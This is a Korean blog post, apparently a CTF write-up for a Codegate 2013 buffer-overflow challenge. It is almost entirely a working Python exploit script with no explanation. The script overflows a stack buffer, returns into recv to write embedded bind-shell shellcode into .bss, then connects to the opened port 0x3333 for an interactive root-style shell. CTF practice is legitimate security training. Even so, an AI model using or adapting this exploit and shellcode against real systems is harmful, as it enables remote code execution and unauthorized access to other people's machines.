어찌된 문제가 200보다 100이 더 어렵다...
엄청 간단한 스택 버퍼 오버플로우이므로 설명은 생략.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 | from hackutil import * from socket import * from time import * from telnetlib import * HOST = '192.168.136.180' PORT = 7777 #===================================== Dummy = 'write' recv_plt = 0x08048780 bss = 0x0804b0a0 shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66" "\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89" "\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52" "\x66\x68\x33\x33\x66\x53\x89\xe1\x6a\x10" "\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04" "\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3" "\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3" "\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80" "\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89" "\xe1\x52\x89\xe2\xb0\x0b\xcd\x80") # bind port : 0x3333 #===================================== s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) print s.recv(1024) print "==================[ Phase 1 : Inject Payload ]==================" payload = Dummy+'A'*(0xF0) + p32(recv_plt) + p32(bss) payload += p32(4) + p32(bss) + p32(0x1000) + p32(0) printPayload(payload) s.send(payload+'\n') sleep(1) print "===============[ Phase 2 : Attack with Shellcode ]==============" s.send(shellcode+'\n') sleep(1) print "===================[ Phase 3 : Got the Shell ]==================" s2 = socket(AF_INET, SOCK_STREAM) s2.connect((HOST, 0x3333)) t = Telnet() t.sock = s2 t.interact() s.close() | cs |
'CTF > 지난 대회' 카테고리의 다른 글
| Codegate Junior 2015 Prequal - systemshock (0) | 2015.12.05 |
|---|---|
| Codegate 2013 Prequal - vuln 300 (0) | 2015.11.21 |
| Codegate 2015 - Bookstore (0) | 2015.11.16 |
| Layer7 CTF 2015 - Spil..Spli....SPPPPPIILL (0) | 2015.11.03 |
| Codegate 2013 Prequal - vuln 100 (0) | 2015.10.30 |
__미니__
E-mail : skyclad0x7b7@gmail.com 나와 계약해서 슈퍼 하-카가 되어 주지 않을래?